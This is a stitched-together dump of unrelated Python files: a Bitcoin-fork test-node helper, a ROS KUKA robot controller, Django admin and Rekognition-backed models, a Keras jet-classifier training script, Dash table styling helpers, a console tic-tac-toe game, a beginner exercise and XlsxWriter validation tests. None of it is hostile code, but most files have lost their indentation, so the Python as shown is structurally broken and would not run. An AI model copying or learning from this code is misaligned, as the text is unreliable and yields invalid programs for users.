care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, *, wait_for_verack=True, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
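        # Hypothetical usage sketch (P2PInterface is assumed to come from the
        # framework's mininode module):
        #
        #     conn = node.add_p2p_connection(P2PInterface())
        #
        # connects to 127.0.0.1 on p2p_port(node.index) and waits for verack.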
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(**kwargs)()
self.p2ps.append(p2p_conn)
if wait_for_verack:
p2p_conn.wait_for_verack()
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, self._node_msg("No p2p connection")
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
def __init__(self, cli, command):
self.cli = cli
self.command = command
def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
class TestNodeCLI():
"""Interface to merelcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run merelcoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg).lower() if type(arg) is bool else str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same merelcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running merelcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except JSONDecodeError:
return cli_stdout.rstrip("\n")
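# Hypothetical usage sketch (node and RPC names are assumptions, not part of
# this module): TestNodeCLI mirrors the RPC interface through merelcoin-cli.
#
#     node.cli.getblockcount()                   # plain call
#     node.cli('-rpcwallet=w1').getbalance()     # extra command-line options first
#     node.cli.batch([node.cli.getblockcount.get_request(),
#                     node.cli.getbestblockhash.get_request()])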
|
py | 1a344e2bf9eb4ab928babc8fcb78a7377e160851 | #!/usr/bin/env python
# You must run `export ROS_NAMESPACE=/iiwa` in the terminal before running this script
import sys
import copy
import rospy
import moveit_commander
from geometry_msgs.msg import PoseStamped
from sensor_msgs.msg import JointState
import numpy as np
from moveit_msgs.msg import RobotState, Constraints, OrientationConstraint
from sensor_msgs.msg import Image
import cv2
from cv_bridge import CvBridge, CvBridgeError
from os.path import join
import os
import random
class KukaInterface ():
def __init__(self):
self.bridge = CvBridge()
joint_state_topic = ['joint_states:=/iiwa/joint_states']
moveit_commander.roscpp_initialize(joint_state_topic)
rospy.Subscriber("/iiwa/joint_states", JointState, self.State_callback)
# Instantiate a RobotCommander object. This object is
# an interface to the robot as a whole.
self.robot = moveit_commander.RobotCommander()
self.group = moveit_commander.MoveGroupCommander("manipulator")
# rospy.sleep(2)
# self.scene = moveit_commander.PlanningSceneInterface('/iiwa/move_group/monitored_planning_scene')
# box_pose = PoseStamped()
# box_pose.header.frame_id = "world"
# box_pose.pose.position.x = 1.0
# box_pose.pose.orientation.w = 1.0
# self.scene.add_box("test", box_pose, size=(0.1, 0.2, 0.3))
# while not rospy.is_shutdown():
# rospy.sleep(1.0)
# for k in self.scene.__dict__.keys():
# print(k, self.scene.__dict__[k])
# # print(self.scene)
# print(self.scene.get_known_object_names())
# print(self.scene.get_attached_objects())
# exit()
self.group.set_max_velocity_scaling_factor(0.05)
self.group.set_max_acceleration_scaling_factor(0.05)
current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose
self._joint_efforts = 0
self._joint_vel = 0
self._joint_name = 0
self._header = None
pose = PoseStamped()
self.upright_constraints = Constraints()
self.upright_constraints.name = "upright"
orientation_constraint = OrientationConstraint()
orientation_constraint.header.frame_id = self.group.get_planning_frame()
orientation_constraint.link_name = self.group.get_end_effector_link()
pose.pose.orientation.x = 1.0
pose.pose.orientation.y = 0.0
pose.pose.orientation.z = 0.0
pose.pose.orientation.w = 0.0
orientation_constraint.orientation = pose.pose.orientation
orientation_constraint.absolute_x_axis_tolerance = .7#3.0
orientation_constraint.absolute_y_axis_tolerance = .7#3.0
orientation_constraint.absolute_z_axis_tolerance = 3.1415
#orientation_constraint.absolute_z_axis_tolerance = 3.14 #ignore this axis
orientation_constraint.weight = 1
self.upright_constraints.orientation_constraints.append(orientation_constraint)
self.group.allow_replanning(True)
self.group.allow_looking(True)
workspace = [0.5,-0.3,0.15,0.7,0.2,0.25]
# self.group.set_workspace(workspace)
# self.group.set_path_constraints(self.upright_constraints)
self.traj_num = -1
self.im_num = 0
self.MAX_PATH_LENGTH = 15
def Robot_State(self):
if len(self.group.get_current_joint_values())>0:
return True
else:
return False
def State_callback(self,data):
self._joint_efforts = data.effort
self._joint_vel = data.velocity
self._joint_name = data.name
self._header = data.header
def _calc_plan_statistics(self, plan, print_stats=False):
if len(plan.joint_trajectory.points) == 0:
rospy.logerr("Plan is empty. No statistics will be calculated")
return
total_distances = [0] * len(plan.joint_trajectory.points[0].positions)
max_distances = [0] * len(plan.joint_trajectory.points[0].positions)
max_vels = [0] * len(plan.joint_trajectory.points[0].positions)
max_accels = [0] * len(plan.joint_trajectory.points[0].positions)
for i, point in enumerate(plan.joint_trajectory.points):
# Ignore wrist joint
for j in range(len(point.positions) - 1):
max_vels[j] = max(max_vels[j], abs(point.velocities[j]))
max_accels[j] = max(max_accels[j], abs(point.accelerations[j]))
if i > 0:
diff = abs(point.positions[j] - plan.joint_trajectory.points[i-1].positions[j])
max_distances[j] = max(max_distances[j], diff)
total_distances[j] += diff
if print_stats:
if abs(point.positions[0]) > np.pi / 2:
rospy.logerr("joint 0 to pos %f", point.positions[0])
print "Positions:", point.positions
if print_stats:
print "\n\n\n\n\n\n\n"
print "Total_distances:", total_distances
print "Total distance:", sum(total_distances)
print "max distance:", max_distances
print "max of max_distances:", max(max_distances)
print "max_vels:", max_vels
print "max of vels:", max(max_vels)
print "max_accels:", max_accels
print "max of max_accels:", max(max_accels)
print "\n\n\n\n\n\n\n"
if max(max_distances) > 0.1:
rospy.logerr("Max distance: %f", max(max_distances))
if sum(total_distances) > 1.5:
rospy.logerr("total move: %f", sum(total_distances))
return sum(total_distances)
def _plan_to_position(self, position):
pose = [position[0],
position[1],
position[2],
np.pi,
0.0,
0.0]
replan_count = 0
self.group.set_pose_target(pose, end_effector_link='iiwa_link_ee')
plan = self.group.plan()
move_distance = self._calc_plan_statistics(plan)
print("plan length is", len(plan.joint_trajectory.points) )
while len(plan.joint_trajectory.points) > self.MAX_PATH_LENGTH:
print("Replan after plan length:", len(plan.joint_trajectory.points))
print("replanned", replan_count, "times")
pose[5] = 2 * np.pi * random.random()
self.group.set_pose_target(pose, end_effector_link='iiwa_link_ee')
plan = self.group.plan()
replan_count += 1
# if replan_count > 20 and len(plan.joint_trajectory.points) < 20:
# rospy.logerr("Exiting with lower standards. This make break")
# break
move_distance = self._calc_plan_statistics(plan)
if replan_count > 20:
rospy.logerr("Planning failed. Attempting to reset position")
self.move_kuka_to_neutral()
replan_count = 0
self._calc_plan_statistics(plan, print_stats=True)
return plan
def move_kuka_to_neutral(self):
plan = self._plan_to_position([0.6,-0.05,0.4])
# NEUTRAL_POSE= [0.6,-0.05,0.4,3.14159, 0.0, 0.0]
# current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose
# # print(self.group.get_current_joint_values())
# # self.group.set_position_target(NEUTRAL_POSE[:3], end_effector_link='iiwa_link_ee')
# self.group.set_pose_target(NEUTRAL_POSE, end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
# print("Plan length:", len(plan.joint_trajectory.points))
# while len(plan.joint_trajectory.points) > 15:
# print("Trying new random orientation")
# print("Plan length:", len(plan.joint_trajectory.points))
# NEUTRAL_POSE = [NEUTRAL_POSE[0], NEUTRAL_POSE[1], NEUTRAL_POSE[2], NEUTRAL_POSE[3], NEUTRAL_POSE[4], 2 * np.pi * random.random()]
# self.group.set_pose_target(NEUTRAL_POSE, end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
# print(self.group.get_current_joint_values())
print("plan length executed is", len(plan.joint_trajectory.points) )
if not plan.joint_trajectory.points:
print "[ERROR] No trajectory found"
else:
# print(self.group.get_joint_value_target())
self.group.go(wait=True)
self.traj_num = self.traj_num + 1
def move_kuka_to_eep(self, target_pose):
p, q = target_pose[:3], target_pose[3:]
if p[0]>0.68:
p[0] = 0.68
elif p[0]<0.52:
p[0] = 0.52
if p[1]>0.18:
p[1] = 0.18
elif p[1]<-0.28:
p[1] = -0.28
if p[2]>0.25:
p[2] = 0.25
elif p[2]<0.15:
p[2] = 0.15
plan = self._plan_to_position(p)
# goal_pose = [p[0], p[1], p[2], 3.14159, 0.0, 2 * np.pi * random.random()]
current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
# # print(current_pose.position)
# # print(current_pose.orientation)
# self.group.set_pose_target(goal_pose, end_effector_link='iiwa_link_ee')
# # self.group.set_position_target(goal_pose[:3], end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
# print("Plan length:", len(plan.joint_trajectory.points))
# while len(plan.joint_trajectory.points) > self.MAX_PATH_LENGTH:
# print("Trying new random orientation")
# print("Plan length:", len(plan.joint_trajectory.points))
# goal_pose = [p[0], p[1], p[2], 3.14159, 0.0, 2 * np.pi * random.random()]
# self.group.set_pose_target(goal_pose, end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
print("plan length executed is", len(plan.joint_trajectory.points) )
if not plan.joint_trajectory.points:
print "[ERROR] No trajectory found"
else:
self.group.go(wait=True)
target_position = np.asarray([p[0],p[1],p[2]])
current_position = np.asarray([current_pose.x,current_pose.y,current_pose.z])
# while(np.linalg.norm(current_position-target_position)>0.01):
# current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
# current_position = np.asarray([current_pose.x,current_pose.y,current_pose.z])
# print("position difference is = ", np.sum(current_position-target_position))
def move_kuka_to_ja(self):
        """
        :param waypoints: List of joint angle arrays. If len(waypoints) == 1: then go directly to point.
        Otherwise: take trajectory that ends at waypoints[-1] and passes through each intermediate waypoint
        :param duration: Total time trajectory will take before ending
        """
        pass
    #*** Probably don't need this *** ###
def redistribute_kuka_objects(self):
P1 = [0.5,-0.05,0.2,3.14159, 0.0, 0.0]
P2 = [0.6,-0.05,0.2,3.14159, 0.0, 0.0]
P3 = [0.5,-0.3,0.4,3.14159, 0.0, 0.0]
P4 = [0.5,-0.3,0.2,3.14159, 0.0, 0.0]
P5 = [0.6,-0.15,0.2,3.14159, 0.0, 0.0]
P6 = [0.6,-0.3,0.4,3.14159, 0.0, 0.0]
P7 = [0.6,-0.3,0.2,3.14159, 0.0, 0.0]
P8 = [0.6,-0.15,0.2,3.14159, 0.0, 0.0]
P9 = [0.7,-0.3,0.4,3.14159, 0.0, 0.0]
P10 = [0.7,-0.3,0.2,3.14159, 0.0, 0.0]
P11 = [0.6,-0.15,0.2,3.14159, 0.0, 0.0]
P12 = [0.7,-0.05,0.4,3.14159, 0.0, 0.0]
P13 = [0.7,-0.05,0.2,3.14159, 0.0, 0.0]
P14 = [0.6,-0.05,0.2,3.14159, 0.0, 0.0]
P15 = [0.7,0.2,0.4,3.14159, 0.0, 0.0]
P16 = [0.7,0.2,0.2,3.14159, 0.0, 0.0]
P17 = [0.6,0.1,0.2,3.14159, 0.0, 0.0]
P18 = [0.6,0.2,0.4,3.14159, 0.0, 0.0]
P19 = [0.6,0.2,0.2,3.14159, 0.0, 0.0]
P20 = [0.6,0.1,0.2,3.14159, 0.0, 0.0]
P21 = [0.5,0.2,0.4,3.14159, 0.0, 0.0]
P22 = [0.5,0.2,0.2,3.14159, 0.0, 0.0]
P23 = [0.6,0.1,0.2,3.14159, 0.0, 0.0]
Pn= [0.5,-0.05,0.4,3.14159, 0.0, 0.0]
redist_traj = [Pn,P1,P2,P3,P4,P5,P6,P7,P8,P9,P10,P11,P12,P13,P14,P15,P16,P17,P18,P19,P20,P21,P22,P23,Pn]
for i in redist_traj:
self.group.set_pose_target(i, end_effector_link='iiwa_link_ee')
plan = self.group.plan()
if not plan.joint_trajectory.points:
print "[ERROR] No trajectory found"
else:
self.group.go(wait=True)
current_pos = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
current_position = np.asarray([current_pos.x,current_pos.y,current_pos.z])
target_position = np.asarray(i[0:3])
# print(target_position)
                # initialise the timeout counter once, outside the loop, so the
                # bail-out below can actually trigger
                counter = 0
                while(abs(np.sum(current_position-target_position))>0.01):
                    current_pos = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
                    current_position = np.asarray([current_pos.x,current_pos.y,current_pos.z])
                    print("position difference is = ", np.sum(current_position-target_position))
                    counter = counter + 1
                    if counter>10000000:
                        return
"""
Play pre-recorded trajectory that sweeps objects into center of bin
"""
pass
def get_kuka_state(self):
# return joint_angles, joint_velocities, eep
return self.group.get_current_joint_values(),self.get_kuka_joint_angles_velocity(),self.get_kuka_cartesian_pose()
# return self.get_kuka_joint_angles(), self.get_kuka_joint_angles_velocity(), self.get_kuka_cartesian_pose()
def get_kuka_joint_angles(self):
#returns current joint angles
return self.group.get_current_joint_values()
def get_kuka_joint_angles_velocity(self):
#returns current joint angle velocities
# rospy.sleep(0.01)
return self._joint_vel
def get_kuka_joint_angles_names(self):
#returns current joint angle velocities
# rospy.sleep(0.01)
return self._joint_name
def get_kuka_joint_angles_effort(self):
#returns current joint angle velocities
# rospy.sleep(0.01)
return self._joint_efforts
def get_kuka_cartesian_pose(self):
#Returns cartesian end-effector pose
pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose
eep = np.array([pose.position.x,
pose.position.y,
pose.position.z,
pose.orientation.w,
pose.orientation.x,
pose.orientation.y,
pose.orientation.z])
return eep
def get_xyz_quat(self):
# separates cartesian pose into xyz, quaternion arrays
position = self.get_kuka_cartesian_pose().position
orient = self.get_kuka_cartesian_pose().orientation
return position.x,position.y,position.z,orient.x,orient.y,orient.z,orient.w
def save_images(self):
# base_path = "/home/server/Desktop/saved_images/"
# data = rospy.wait_for_message('/camera1/usb_cam/image_raw', Image)
# print("wait_for_message stamp:", data.header.stamp)
# try:
# cv_image = self.bridge.imgmsg_to_cv2(data, "passthrough")
# except CvBridgeError as e:
# print(e)
# print "Saved to: ", base_path+str(0)+".jpg"
# cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB, cv_image)
# cv2.imwrite(join(base_path, "frame{:06d}.jpg".format(0)), cv_image)#*255)
### ********************#####
path = "/home/server/Desktop/traj_images/" +str(self.traj_num)
folders = ['Image0','Image1','Image2']
for folder in folders:
base_path = os.path.join(path,folder)
if not os.path.exists(base_path):
os.makedirs(base_path)
data0 = rospy.wait_for_message('/camera1/usb_cam/image_raw', Image)
data1 = rospy.wait_for_message('/camera2/usb_cam/image_raw', Image)
data2 = rospy.wait_for_message('/camera3/usb_cam/image_raw', Image)
print("wait_for_message stamp of camera 1:", data0.header.stamp,"\n")
print("wait_for_message stamp of camera 2:", data1.header.stamp,"\n")
print("wait_for_message stamp of camera 3:", data2.header.stamp,"\n")
try:
cv_image0 = self.bridge.imgmsg_to_cv2(data0, "passthrough")
cv_image1 = self.bridge.imgmsg_to_cv2(data1, "passthrough")
cv_image2 = self.bridge.imgmsg_to_cv2(data2, "passthrough")
except CvBridgeError as e:
print(e)
print "Saved to: ", path+str(self.traj_num)
cv2.cvtColor(cv_image0, cv2.COLOR_BGR2RGB, cv_image0)
cv2.cvtColor(cv_image1, cv2.COLOR_BGR2RGB, cv_image1)
cv2.cvtColor(cv_image2, cv2.COLOR_BGR2RGB, cv_image2)
cv2.imwrite(join(path,"Image0", "frame{:06d}.jpg".format(self.im_num)), cv_image0)#*255)
cv2.imwrite(join(path,"Image1", "frame{:06d}.jpg".format(self.im_num)), cv_image1)#*255)
cv2.imwrite(join(path,"Image2", "frame{:06d}.jpg".format(self.im_num)), cv_image2)#*255)
if __name__ == '__main__':
rospy.init_node("standalone_robot_controller", anonymous=True)
kuka_obj = KukaInterface()
try:
kuka_obj.move_kuka_to_neutral()
except rospy.ROSInterruptException:
pass
|
py | 1a344e5e94adc38154a7e1887e7d14c3c5aceca2 | from django.contrib import admin
from .models import *
# Register your models here.
from import_export.admin import ImportExportModelAdmin
class productAdmin(ImportExportModelAdmin):
list_display = ('modelno','size','price')
search_fields = ('modelno','size','water','gas','air','wpf','density','vescosity','temp','pressure','distance','price')
list_per_page = 15
admin.site.register(product,productAdmin) |
py | 1a344f791b8da620ea5bd366fdd935006b913861 | #!/usr/bin/env python2.7
from sys import exit, stdout, argv
from os import environ, system
environ['KERAS_BACKEND'] = 'tensorflow'
import numpy as np
import signal
from keras.layers import Input, Dense, Dropout, concatenate, LSTM, BatchNormalization, Conv1D, concatenate, CuDNNLSTM
from keras.models import Model
from keras.callbacks import ModelCheckpoint, LambdaCallback, TensorBoard
from keras.optimizers import Adam, SGD
from keras.utils import np_utils
from keras import backend as K
K.set_image_data_format('channels_last')
from subtlenet import config
from subtlenet.generators.gen import make_coll, generate
'''
some global definitions
'''
NEPOCH = 20
APOSTLE = 'v1'
system('cp %s particle_models/train_%s.py'%(argv[0], APOSTLE))
config.limit = 50
#config.DEBUG = True
'''
instantiate data loaders
'''
basedir = '/local/snarayan/genarrays/v_deepgen_1'
#basedir = '/fastscratch/snarayan/genarrays/v_deepgen_0'
top = make_coll(basedir + '/PARTITION/Top_*_CATEGORY.npy')
hig = make_coll(basedir + '/PARTITION/Higgs_*_CATEGORY.npy')
qcd = make_coll(basedir + '/PARTITION/QCD_*_CATEGORY.npy')
data = [top, hig, qcd]
data[0].objects['train']['particles'].load(memory=False)
dims = data[0].objects['train']['particles'].data.data.shape
dims = (None, dims[1], dims[2]-1) # need to exclude the last column
if config.limit is not None:
dims = (None, config.limit, dims[-1]) # override
'''
first build the classifier!
'''
# set up data
opts = {
'learn_mass' : True,
'learn_pt' : True,
}
classifier_train_gen = generate(data, partition='train', batch=500, **opts)
classifier_validation_gen = generate(data, partition='validate', batch=1000, **opts)
classifier_test_gen = generate(data, partition='test', batch=10, **opts)
test_i, test_o, test_w = next(classifier_test_gen)
# build all inputs
input_particles = Input(shape=(dims[1], dims[2]), name='input_particles')
input_mass = Input(shape=(1,), name='input_mass')
input_pt = Input(shape=(1,), name='input_pt')
inputs = [input_particles, input_mass, input_pt]
# now build the particle network
h = BatchNormalization(momentum=0.6, name='particles_input_bnorm')(input_particles)
h = Conv1D(32, 2, activation='relu', name='particles_conv0', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6, name='particles_conv0_bnorm')(h)
h = Conv1D(16, 4, activation='relu', name='particles_conv1', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6, name='particles_conv1_bnorm')(h)
h = CuDNNLSTM(100, name='particles_lstm')(h)
h = Dropout(0.1)(h)
h = BatchNormalization(momentum=0.6, name='particles_lstm_norm')(h)
h = Dense(100, activation='relu',name='particles_lstm_dense',kernel_initializer='lecun_uniform')(h)
particles_final = BatchNormalization(momentum=0.6,name='particles_lstm_dense_norm')(h)
# merge everything
to_merge = [particles_final, input_mass, input_pt]
h = concatenate(to_merge)
for i in xrange(1,5):
h = Dense(50, activation='relu',name='final_dense%i'%i)(h)
if i%2:
h = Dropout(0.1)(h)
h = BatchNormalization(momentum=0.6,name='final_dense%i_norm'%i)(h)
y_hat = Dense(config.n_truth, activation='softmax')(h)
classifier = Model(inputs=inputs, outputs=[y_hat])
classifier.compile(optimizer=Adam(lr=0.0005),
loss='categorical_crossentropy',
metrics=['accuracy'])
print '########### CLASSIFIER ############'
classifier.summary()
print '###################################'
# ctrl+C now triggers a graceful exit
def save_classifier(name='classifier', model=classifier):
model.save('particle_models/%s_%s.h5'%(name, APOSTLE))
def save_and_exit(signal=None, frame=None, name='classifier', model=classifier):
save_classifier(name, model)
exit(1)
signal.signal(signal.SIGINT, save_and_exit)
classifier.fit_generator(classifier_train_gen,
steps_per_epoch=3000,
epochs=NEPOCH,
validation_data=classifier_validation_gen,
validation_steps=1000,
callbacks = [ModelCheckpoint('particle_models/classifier_conv_%s_{epoch:02d}_{val_loss:.5f}.h5'%APOSTLE)],
)
save_classifier()
|
py | 1a34501fe0c9b85dba2ff08576579104ca20c8a4 | # Desenvolva um programa que leia o nome, idade, e sexo de 4 pessoas.
# No final do progrma, mostre:
#
# - A média de idade do grupo
# - O nome do homem mais velho
# - Quantas mulheres tem menos de 20 anos
nome_velho = ''
idade_maior = 0
soma = 0
cont_media = 0
cont_feminino = 0
for c in range(1, 5):
nome = str(input('Qual seu nome: ')).strip().upper()
idade = int(input('Qual a sua idade: '))
sexo = str(input('Qual o seu sexo '
'\n(F) para feminino'
'\n(M) para masculino: ')).strip().upper()
soma += idade
cont_media += 1
if idade > idade_maior and sexo == 'M':
idade_maior = idade
nome_velho = nome
if sexo == 'F' and idade < 20:
cont_feminino += 1
media = soma/cont_media
print(f'A média da idade do grupo é de {media:.2f} anos.'
      f'\nO homem mais velho do grupo é o {nome_velho} que tem {idade_maior} anos.'
      f'\n{cont_feminino} mulheres têm menos de 20 anos')
|
py | 1a3450d36cca83ba1efe9acbac3486d23d93763e | from django.db import models
from pprint import pprint
from paradiso.storage_backends import FaceStorage, EventStorage
from django.urls import reverse, reverse_lazy
from rekognition import VideoDetect
def rename_guest_photo(instance, filename):
return str(instance)
class Guest(models.Model):
name = models.CharField(max_length=30, primary_key=True)
photo = models.ImageField(upload_to=rename_guest_photo, storage=FaceStorage())
external_id = models.CharField(max_length=100, null=True)
# def get_absolute_url(self):
# return reverse("eye_of_providence:guest-detail", kwargs={"pk": self.pk})
def __str__(self):
return self.name
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
analyzer = VideoDetect()
analyzer.indexFace(str(self))
face_list = analyzer.listFaces()["Faces"]
# if there is no external id, get it
if self.external_id == None:
for face in face_list:
if face['ExternalImageId'] == self.name:
self.external_id = face["FaceId"]
break
self.save()
def delete(self, *args, **kwargs):
analyzer = VideoDetect()
analyzer.deleteFace(self.external_id)
super().delete(*args, **kwargs)
def rename_event_video(instance, filename):
return str(instance)
class Event(models.Model):
name = models.CharField(max_length=30)
known_guests = models.ManyToManyField(Guest, blank=True)
potential_faces = models.IntegerField(blank=True, null=True)
video = models.FileField(upload_to=rename_event_video, storage=EventStorage())
def analyse(self):
analyzer = VideoDetect()
matches = analyzer.main(str(self))
self.potential_faces = matches[1]
for guest_name in matches[0]:
guest = Guest.objects.get(name=guest_name)
self.known_guests.add(guest)
self.save()
# def save(self, *args, **kwargs):
# super().save(*args, **kwargs)
# def delete(self, *args, **kwargs):
# super().delete(*args, **kwargs)
# def get_absolute_url(self):
# return reverse("eye_of_providence:event-detail", kwargs={"pk": self.pk})
def __str__(self):
return str(self.name)
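# Hypothetical usage sketch (file names and the File import are assumptions):
# saving a Guest indexes the face with Rekognition; Event.analyse() then tags
# known guests in an uploaded video.
#
#     from django.core.files import File
#
#     guest = Guest.objects.create(name='alice', photo=File(open('alice.jpg', 'rb')))
#     event = Event.objects.create(name='launch', video=File(open('launch.mp4', 'rb')))
#     event.analyse()   # fills event.known_guests and event.potential_faces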
|
py | 1a345149fe3d1850f6f0f5adb30ebdc620d002c3 | def data_bars(df, column):
n_bins = 100
bounds = [i * (1.0 / n_bins) for i in range(n_bins + 1)]
ranges = [
((df[column].max() - df[column].min()) * i) + df[column].min()
for i in bounds
]
styles = []
for i in range(1, len(bounds)):
min_bound = ranges[i - 1]
max_bound = ranges[i]
max_bound_percentage = bounds[i] * 100
styles.append({
'if': {
'filter_query': (
'{{{column}}} >= {min_bound}' +
(' && {{{column}}} < {max_bound}' if (i < len(bounds) - 1) else '')
).format(column=column, min_bound=min_bound, max_bound=max_bound),
'column_id': column
},
'background': (
"""
linear-gradient(90deg,
#0074D9 0%,
#0074D9 {max_bound_percentage}%,
white {max_bound_percentage}%,
white 100%)
""".format(max_bound_percentage=max_bound_percentage)
),
'paddingBottom': 2,
'paddingTop': 2
})
return styles
def data_bars_diverging(df, column, color_above='#3D9970', color_below='#FF4136'):
n_bins = 100
bounds = [i * (1.0 / n_bins) for i in range(n_bins + 1)]
col_max = df[column].max()
col_min = df[column].min()
ranges = [
((col_max - col_min) * i) + col_min
for i in bounds
]
midpoint = (col_max + col_min) / 2.
styles = []
for i in range(1, len(bounds)):
min_bound = ranges[i - 1]
max_bound = ranges[i]
min_bound_percentage = bounds[i - 1] * 100
max_bound_percentage = bounds[i] * 100
style = {
'if': {
'filter_query': (
'{{{column}}} >= {min_bound}' +
(' && {{{column}}} < {max_bound}' if (i < len(bounds) - 1) else '')
).format(column=column, min_bound=min_bound, max_bound=max_bound),
'column_id': column
},
'paddingBottom': 2,
'paddingTop': 2
}
if max_bound > midpoint:
background = (
"""
linear-gradient(90deg,
white 0%,
white 50%,
{color_above} 50%,
{color_above} {max_bound_percentage}%,
white {max_bound_percentage}%,
white 100%)
""".format(
max_bound_percentage=max_bound_percentage,
color_above=color_above
)
)
else:
background = (
"""
linear-gradient(90deg,
white 0%,
white {min_bound_percentage}%,
{color_below} {min_bound_percentage}%,
{color_below} 50%,
white 50%,
white 100%)
""".format(
min_bound_percentage=min_bound_percentage,
color_below=color_below
)
)
style['background'] = background
styles.append(style)
return styles
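# Hypothetical usage sketch (the DataFrame, column name, and Dash import are
# assumptions, not part of this module): pass the generated rules to a DataTable.
#
#     import pandas as pd
#     from dash import dash_table   # older Dash versions: `import dash_table`
#
#     df = pd.DataFrame({'value': [1, 5, 10, 20]})
#     table = dash_table.DataTable(
#         data=df.to_dict('records'),
#         columns=[{'name': c, 'id': c} for c in df.columns],
#         style_data_conditional=data_bars(df, 'value'),
#     )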
|
py | 1a3451b4a3a3b5757a0b5dc5f3f211c5421cb439 | from Color_Console import *
import platform
import re
from logic import *
def clear_console():
if is_linux:
os.system('clear')
else:
os.system('cls')
def get_move():
move = input().upper()
while not re.match("(1|2|3)-(A|B|C)", move):
        ctext("Please use the DIGIT-LETTER format, e.g. 1-A", "red")
move = input().upper()
return move
if __name__ == "__main__":
game = Game()
    is_linux = platform.system() == 'Linux'  # compare explicitly; platform.system() returns a string
while not game.have_winner() and not game.have_draw():
clear_console()
game.print_grid()
print("")
print(f"Now {game.paint_symbol(game.current_symbol)} move")
ctext("*Move must be printed in format DIGIT-SYMBOL where DIGIT is column, SYMBOL is row as on the above grid", "yellow")
move = get_move()
while not game.put(move):
ctext("Wrong move", "red")
move = get_move()
else:
clear_console()
game.print_grid()
print("")
if game.have_winner():
ctext(f"Winner is {game.get_winner()}", "green")
else:
ctext("Draw", "yellow")
|
py | 1a34521fa4f22719f3092aafb887c3f53afbecc5 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, [email protected]
#
import unittest
from datetime import date, time
from ...compatibility import StringIO
from ...worksheet import Worksheet
from ..helperfunctions import _xml_to_list
class TestWriteDataValidations(unittest.TestCase):
"""
Test the Worksheet _write_data_validations() method.
"""
def setUp(self):
self.maxDiff = None
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_data_validations_1(self):
"""
Test 1 Integer between 1 and 10.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_2(self):
"""
Test 2 Integer not between 1 and 10.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'not between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notBetween" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_3(self):
"""
Test 3,4,5 Integer == 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'equal to',
'value': 1,
})
